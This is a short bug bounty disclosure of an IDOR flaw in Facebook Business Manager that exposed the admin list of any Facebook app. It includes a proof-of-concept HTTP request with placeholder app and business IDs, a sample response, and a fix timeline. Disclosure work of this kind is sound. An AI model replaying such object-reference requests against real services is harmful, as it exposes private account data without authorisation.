Disclose Full Admin List of any Facebook Applications

In Facebook Business Manager, there is an endpoint that fetches the admin list particularly for pages, apps and more other assets. Meantime, call for Facebook Pages was secured but was vulnerable for the asset type apps.

IDOR (Insecure Direct Object Reference) vulnerability allowed to fetch the admin list for any Facebook Application regardless of having the app assigned in the business manager account which was unrestricted.

Proof of concept

Request:

POST /business/aymc_assets/admins/ HTTP/1.1
Host: business.facebook.com

asset_ids[0]=TARGET_APP_ID
business_id=ATTACKER_BUSINESS_ID

Response:

{"__ar": 1, "payload": {
    "assetAdmins": {
      "__imm": {
        "method": "Map",
        "value": [
          ["123456789",
            {"name": "fname lname",
              "id": "123456789",
              "iconURI": "/images/assets_DO_NOT_HARDCODE/facebook_icons/badge-admin_outline_20_fds-black.png",
              "isSelected": true,
              "isSelectionDisabled": false,
              "secondaryInfo": "FACEBOOK APP NAME"
            }],
          ["123456789xxN",
            {"name": "Admin N",
              "id": "123456789xxN",
              "iconURI": "/images/assets_DO_NOT_HARDCODE/facebook_icons/badge-admin_outline_20_fds-black.png",
              "isSelected": true,
              "isSelectionDisabled": false,
              "secondaryInfo": "FACEBOOK APP NAME"
            }]]}}}}

Impact

This could have let a malicious user to disclose any app admin/developer list.

Timeline

• 25 Dec, 2018 – Report Sent.
• 04 Jan, 2019 – Escalation by Facebook.
• 08 Jan, 2019 – Fixed by Facebook.
• 27 Mar, 2019 – Bounty Awarded by Facebook.